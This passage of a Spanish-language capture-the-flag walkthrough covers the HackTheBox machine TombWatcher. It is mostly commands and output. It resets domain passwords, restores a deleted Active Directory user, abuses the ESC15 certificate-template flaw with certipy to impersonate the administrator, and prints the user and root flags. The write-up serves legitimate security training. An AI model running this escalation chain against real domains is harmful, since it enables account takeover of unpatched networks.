python3 bloodyAD.py -d 'tombwatcher.htb' -u 'sam' -p 'P@ssw0rd123!' --host <IP> set password 'john' 'JohnPassword123!'Info:
[+] Password changed successfully!Evil-winrm
Veremos que ha funcionado, vamos a probar a meternos por WinRM de esta forma:
evil-winrm -i <IP> -u john -p 'JohnPassword123!'Info:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> whoami
tombwatcher\johnCon esto ya estaremos dentro, por lo que leeremos la flag del usuario.
user.txt
01f234e8a41cc2176519e3ff68c229b9Escalate Privileges
Despues de un rato buscando, vamos a probar una tecnica llamada Tombstone AD que es similar al nombre de la maquina de HTB, primero vamos a obtener los objetos o usuarios que estan marcados como eliminados.
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjectsInfo:
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
ObjectClass : user
ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebfVeremos que hay un usuario llamado cert_admin el cual es bastante interesante, vamos a probar a restaurar a dicho usuario.
Get-ADObject -Filter 'sAMAccountName -eq "cert_admin"' -IncludeDeletedObjects | Sort-Object -Property whenDeleted -Descending | Select-Object -First 1 | Restore-ADObjectAhora si listamos los usuarios...
net user /domainInfo:
User accounts for \\
-------------------------------------------------------------------------------
Administrator Alfred cert_admin
Guest Henry john
krbtgt sam
The command completed with one or more errors.Veremos que se restauro de forma correcta, vamos a probar a cambiarle la contraseña a dicho usuario de esta forma:
Set-ADAccountPassword -Identity cert_admin -NewPassword (ConvertTo-SecureString "Password123!" -AsPlainText -Force)Ahora si nos vamos a otra terminal de nuestro atacante y probamos lo siguiente:
netexec smb <IP> -u cert_admin -p 'Password123!' --sharesInfo:
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\cert_admin:Password123!
SMB 10.10.11.72 445 DC01 [*] Enumerated shares
SMB 10.10.11.72 445 DC01 Share Permissions Remark
SMB 10.10.11.72 445 DC01 ----- ----------- ------
SMB 10.10.11.72 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.72 445 DC01 C$ Default share
SMB 10.10.11.72 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.72 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.72 445 DC01 SYSVOL READ Logon server shareVeremos que se cambio de forma correcta, si lanzamos en PowerShell este comando para ver la informacion de las plantillas:
certutil -template -vVeremos despues de un buen rato e investigando mucho esta plantilla de aqui:
WebServer (Template[31])
Allow Enroll S-1-5-21-1392491010-1358638721-2126982587-1111
Allow Read S-1-5-21-1392491010-1358638721-2126982587-1111El SID del cert_admin es S-1-5-21-1392491010-1358638721-2126982587-1111, coincide con la plantilla de WebServer, por lo que el usuario cert_admin tiene permisos Enroll en la plantilla WebServer. Esto significa que puede solicitar certificados usando esa plantilla.
Si lo verificamos con un prqueño script:
*Evil-WinRM* PS C:\Users\john\Documents> Get-ADObject -Filter * -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=tombwatcher,DC=htb" | ForEach-Object {
$acl = Get-ACL "AD:\$($_.DistinguishedName)"
$access = $acl.Access | Where-Object {$_.IdentityReference -like "*1111*" -or $_.IdentityReference -like "*cert_admin*"}
if ($access) {
Write-Host "Template: $($_.Name)" -ForegroundColor Green
$access | Format-Table IdentityReference, ActiveDirectoryRights, AccessControlType
}
}Info:
Template: WebServer
IdentityReference ActiveDirectoryRights AccessControlType
----------------- --------------------- -----------------
TOMBWATCHER\cert_admin GenericRead Allow
TOMBWATCHER\cert_admin ReadProperty, WriteProperty, ExtendedRight AllowVeremos que efectivamente si los tiene ya confirmado, pero antes vamos a probar tambien con una herramienta que te automatiza todo esto.
certipy-ad find -dc-ip '<IP>' -vulnerable -u 'cert_admin' -p 'Password123!' -stdoutInfo:
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC
Certificate Validity Start : 2024-11-16 00:47:48+00:00
Certificate Validity End : 2123-11-16 00:57:48+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : TOMBWATCHER.HTB\Administrators
Access Rights
ManageCa : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
ManageCertificates : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Enroll : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.Veremos que aqui nos muestra una mucho mejor que es la ESC15 vemos que es vulnerable ya directamente, por lo que vamos a realizar lo siguiente para solicitar el certificado del admin:
certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Password123!' -dc-ip '<IP>' -target 'DC01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'administrator@tombwatcher.htb' -application-policies 'Client Authentication'Info:
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'Veremos que nos deja un archivo administrator.pfx que es el certificado del admin, vamos autenticarnos con dicho certificado:
certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shellInfo:
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] Connecting to 'ldaps://10.10.11.72:636'
[*] Authenticated to '10.10.11.72' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
# whoami
u:TOMBWATCHER\AdministratorObtendremos una shell muy pobre, por lo que vamos a cambiarle la contraseña de esta forma:
change_password administrator P@ssw0rd!Info:
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: P@ssw0rd!
Password changed successfully!Ahora vamos a conectarnos por WinRM con el usuario administrador asi:
evil-winrm -i <IP> -u administrator -p 'P@ssw0rd!'Info:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
tombwatcher\administratorCon esto veremos que ha funcionado y seremos el usuario admin por lo que leeremos la flag del admin.
root.txt
502881619329503edc1a0926b2c62e45Last updated